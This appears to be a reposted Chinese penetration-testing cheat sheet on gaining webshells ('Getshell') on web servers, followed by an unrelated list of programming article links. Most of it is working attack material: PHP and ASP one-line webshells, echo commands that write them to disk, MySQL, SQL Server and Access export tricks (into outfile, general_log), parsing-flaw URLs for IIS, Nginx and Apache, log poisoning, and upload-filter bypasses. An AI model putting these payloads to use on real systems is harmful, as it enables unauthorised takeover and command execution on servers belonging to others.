百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

网站渗透总结之Getshell用法大全

bigegpt 2024-08-12 14:11 2 浏览

Getshell分为进管理员后台Getshell和不进后台Getshell,本文主要总结常见进后台Getshell和部分。

一、进后台Getshell

进台Getshel

1、管理员后台直接Getshell

管理员后台直接上传Getshell,有时候带密码的Webshell连接时容易被waf拦截,可以上传不加密的Webshell如有权限限制可以尝试管理后台自带的修改文件名功能在文件名前加../来穿越目录,如上传的文件为a.php,将a.php修改为../a.php。


2、后台数据库备份Getshell

后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通过新建管理员用户,将用户名用一句话木马代替(用户名通常有长度限制,在前端修改maxlength即可),<%eval

然后再通过备份数据库后访问此界面Getshell。

二、各类上传Getshell

各类上传Getshell

1、修改网站上传类型Getshell

修改网站上传类型,后台设置中添加aasps|asp|php|jsp|aspx|asa|cer,保存后上传aasps文件,上传后为asp文件可以解析Getshll。


2、上传其他脚本类型Getshell

一台服务器有多个站,如a网站为asp脚本,b网站为php脚本,而a中限制了上传文件类型为asp的文件,此时可以上传php的脚本,来拿shell;也可以尝试脚本文件后缀名改为asa或者在后面直接加个.如xx.asp.来突破文件类型限制进行上传来Getshell解

三、解析漏洞Getshell

1、IIS6.0解析漏洞

??http://www.xxx.com/xx.asp/xx.jpg??

??http://www.xxx.com/xx.asp/xx.txt??

??http://www.xxx.com/xx.asp/xx.asp;jpg??


2、IIS7.0/7.5、Nginx<8.0解析漏洞

??http://www.xxx.com/xx.jpg/.php??


3、Nginx<8.03空字节代码执行漏洞

版本范围:Nginx0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

??http://www.xxx.com/xx.jpg%00.php??


4、Apache解析漏洞

??http://www.xxx.com/xx.php.owf.rar??逆向解析,直到能解析出php为止

?

5、CVE-2013-4547 Nginx解析漏洞

??http://www.xxx.com/xx.jpg(非编码空格)\0.php??

四、编辑漏洞Getshell

1、网站配置插马Getshell

进入后台后,网站配置插马getshell,可以找到源码本地搭建,插入时注意与源码闭合,如果插入出错可能导致网站报废。如asp中单引号表示单行注释作用

??%><%eval request("v01cano")%><%??

?

2、编辑器模版Getshell

通过网站的模版编写一句话,然后生成脚本文件getshell 通过将木马添加到压缩文件,把名字改为网站的模版类型,上传到服务器,getshell)(新建或修改目录名为xx.asp/ 此目录下的jsp,html会以asp执行,配置iis6.有0解析漏洞 。

3、修改脚本文件Getshell

修改后台脚本文件插入一句话直接Getshell,尽量插在头和尾 。

?

4、上传插件、更新页面Getshell

进入wordpress,dz等,如编辑wordpress404页面插入一句话,可以先下载对应版本找到404路径,部分OA上传插件Getshell, jboss,tomcat上传war包getshell等。

?

5、执行sql语句写入Webshell

首先执行错误的sql语句,使其暴露出网站的根目录,以ecshop为例,进入后台执行sql查询

??select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";??

关于此语句说明,在windows中有时候需要使用斜杠/有时候需要使用双反斜杠\末尾有时候需要分号,有时候也不需要分号。也可以先将一句话通过ecshop的新建管理员写入到user表中,然后通过数据库备份配合解析漏洞Getshell。

五、命令执行Getshel

1、Windows

1.echo ^<^?php @eval($_POST[C0cho]);?^>^ >c:\1.php


2、Linux

1.echo -e "<?php @assert(\$_POST[C0cho])?>" > 1.php


Linux需要在$前加\进行防转义,Windows需要在<前加^防转义,Windows和Linux中的 “可以使用’或不使用进行尝试

六、文件包含Getshell

1、asp包含

?

??include file="123.jpg"??调用的文件必须和被调用的文件在同一目录,否则找不到,如果不在同一目录,用下面语句也使用如下代码??include virtual="文件所在目录/123.jpg"??

2、php包含

  1. <?php
  2. include('123.jpg');
  3. ?>


3、使用php://input

使用burpsuite截取数据包,并修改内容转发(还可以使用hackbar工具中的post data中输入??<?php fputs(fopen("shell1.php","w"),'1111<?php @assert($_POST[xss])?>2222')?>等一句话木马)??

截取get请求

将一句话木马

访问浏览器查看是否成功

七、数据库命令执行Getshell

1、Access导出

Access可导出xxx等文件需要配合解析漏洞。

  1. create table cmd (a varchar(50));
  2. insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%>
  3. select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd
  4. drop table cmd

菜刀直连??https://www.webshell.cc/1.asa;x.xls??

2、Sqlserver导出

exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>"


3、Mysql导出

以phpMyAdmin为例:

方法一

  1. create TABLE xiaoma (xiaoma1 text NOT NULL);
  2. insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma]);?>');
  3. select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';
  4. drop TABLE IF EXISTS xiaoma;


方法二

select "<?php eval($_POST[v01cano]);?>" into outfile 'D:/phpstudy/www/a.php'

1.

方法三

当数据库路径未知时Getshell

1.//创建表a,并且将httpd.conf写入到表a中

2.create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;


然后执行导出操作,将该文件下载,使用notepad++打开,最后搜索documentroot,即可找到网站的根目录:

文件可能存在的一些路径:

  1. # Windows
  2. c:\windows\php.ini # php配置文件
  3. c:\windows\system32\inetsrv\MetaBase.xml # IIS虚拟主机配置文件
  4. # Linux
  5. /etc/php.ini # php配置文件
  6. /etc/httpd/conf.d/php.conf
  7. /etc/httpd/conf/httpd.conf # Apache配置文件
  8. /usr/local/apache/conf/httpd.conf
  9. /usr/local/apache2/conf/httpd.conf

10./usr/local/mysql

11./user/local/httpd/conf/httpd.conf

12./usr/local/apache/conf/extra/httpd-vhosts.conf # 虚拟目录配置文件

13./user/local/nginx/conf/httpd.conf # Nginx配置文件


方法四

通过load_file函数直接加载该文件内容

1、select load_file('C:/phpStudy/Apache/conf/httpd.conf');

同时需要做如下配置


方法五

general_log_file方法获取Webshell,show global variables like 'secure%'显示secure_file_priv的值为NULL,不能利用写into outfile写木马getshell。

1、show global variables like "%genera%"; #查看genera文件配置情况

2、set global general_log = off; #关闭general_log

3、set global general_log = 'on'; #如果general_log关闭需要开启

4、set global general_log_file = 'D:/www/web/shell.php'


方法六

可执行命令方式

??select '<?php echo \'<pre>\'; system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/shell.php'??

使用方法

www.xxx.com/shell.php?cmd=ipconfig #cmd=后面加命令


方法七

过杀毒软件方式,上传图片马c.jpg,图片马内容如下:

??www.xxx.com/shell.php?cmd=ipconfig #cmd=后面加命令??

导出Webshell

??select '<?php include 'c.jpg'?>' INTO OUTFILE 'D:/work/www/shell.php'??


方法八

直接导出加密Webshell

??select unhex('加密代码') into dumpfile 'D:/www/web/shell.php'??


八、不进后台Getshell

1、0day Getshell

各类OA,coremail,cms,php框架,数据库,java框架等0day,1day,nday Getshell 。

?

2、写入日志Getshell

获取日志路径,在访问过程中在url或者其他位置写入??<?php eval($_POST[c]);?>;??等信息,使其日志记录此代码,然后访问日志路径,菜刀连接Getshell,如phpinfo();中能查看到error.log和access.log的路径。


3、IIS/Tomcat写权限Getshell

IIS6.0,put协议上传手工或工具,批量扫描工具:iis put scaner,写权限利用:桂林老兵

Tomcat put上传 CVE-2017-12615 工具传送门:https://link.zhihu.com/?target=https%3A//github.com/iBearcat/CVE-2017-12615


4、上传会员头像Getshell

将Webshell放入文件夹,然后压缩成zip文件。上传正常头像抓包将图片文件内容删除,burp右键选择文件黏贴功能,将zip包内容复制到burp中的图片内容,放行后菜刀连接图片上传路径下的文件夹(zip压缩包名)下的Webshell 。

?

5、远程命令执行

参考Linux/Windows反弹shell,脚本语言、powershell反弹shell,Kali/Cobalt Strike等各种上线方法 。

?

6、其他漏洞Getshell

XXE,SSRF,反序列化,strust2等一种或多种组合利用Getshell 。

相关推荐

ActiveAndroid使用(对象化数据库)

配置模块的build.gradlerepositories{mavenCentral()mavenLocal()maven{url"https://oss.sonatype.org/conte...

AndroidStudio下的依赖管理(android app依赖外部jar包)

在开发中用第三方库是很常见的事,如何在AndroidStudio下管理这些依赖呢?这就是这篇文章的目的。目录Maven/Ivy仓库依赖Module依赖aar文件依赖jar文件依赖例子完整代码一、Mav...

Android Studio之gradle的配置与介绍

1、gradle的简单介绍Gradle是可以用于Android开发的新一代的BuildSystem,也是AndroidStudio默认的build工具。其实Gradle脚本是基于一种JVM语言—...

Android中的run-as命令带来的安全问题

一、前言最近一周比较忙,没时间写东西了,今天继续开始我们今天的话题:run-as命令,在上周的开发中,遇到一个问题,就是在使用run-as命令的时候出现了一个错误,不过当时因为工作进度的问题,这问题就...

Android系统级深入开发——input驱动程序

1、Input驱动程序是Linux输入设备的驱动程序,分成游戏杆(joystick)、鼠标(mouse和mice)和事件设备(Eventqueue)3种驱动程序。其中事件驱动程序是目前通用的驱动程序...

Android项目中如何用好构建神器Gradle?

CSDN移动将持续为您优选移动开发的精华内容,共同探讨移动开发的技术热点话题,涵盖移动应用、开发工具、移动游戏及引擎、智能硬件、物联网等方方面面。如果您想投稿、参与内容翻译工作,或寻求近匠报道,请发送...

Android Studio自定义文件类头(android studio自定义标题栏)

--简书作者谢恩铭转载请注明出处今天给大家介绍一个很简单的"小"技巧。平时,我们在AndroidStudio中开发Android时,总免不了要创建新的文件,也许是Java文件,也许是C...

C语言#include头文件真的是插入代码吗?

若文章对您有帮助,欢迎关注程序员小迷。助您在编程路上越走越好!编译器理论和实作既是又不是。从编译器理论理解,#include头文件"相当于"插入了头文件的代码,以供源代码引用(宏定...

Android 系统核心机制binder(03)binder C++层实现

本章关键点总结&说明:这里主要关注BinderC++部分即可,看到,也是本章节的核心内容,主要就是以C++封装的框架为主来解读binder。之前主要针对于底层驱动binder的数据交互以及...

Java对象序列化与反序列化的那些事

Java对象序列化与反序列化的那些事在Java的世界里,对象序列化和反序列化就像一对孪生兄弟,它们共同构成了Java对象存储和传输的基础。如果你曾经尝试将对象保存到文件中,或者在网络中传输对象,那么你...

Java对象序列化剖析(java 对象序列化)

对象序列化的目的1)希望将Java对象持久化在文件中2)将Java对象用于网络传输实现方式如果希望一个类的对象可以被序列化/反序列化,那该类必须实现java.io.Serializable接口或jav...

C++模板 - 16(SFINAE)(c++模板编程)

C++支持函数重载,同一个函数名,只要它的签名不一样,可以声明若干个版本(这个特性也是必须的,不然构造函数就只能有一个了)。现在函数的重载集合中又加入了新的成员-函数模板,事情就变得越发有趣起来,...

NewtoSoft.Json相关使用技巧(newtosoft.json相关使用技巧有哪些)

  本篇将为大家介绍Newtonsoft.Json的一些高级用法,可以修改很少的代码解决上述问题。Newtonsoft.Json介绍  在做开发的时候,很多数据交换都是以json格式传输的。而使用Js...

C#调用DeepSeek API(c#调用deepseek api 流式输出)

一、官方网站二、DeepSeek测试DeepSeek三大适用模式:基础模型(V3)、深度思考(R1)、联网搜索。基础模型(V3)深度思考(R1)联网搜索三、C#调用DeepSeekAPI核心代码//...

.NET性能系列文章二:Newtonsoft.Json vs System.Text.Json

微软终于追上了?图片来自GlennCarstens-Peters[1]Unsplash[2]欢迎来到.NET性能系列的另一章。这个系列的特点是对.NET世界中许多不同的主题进行研究、基准和比较...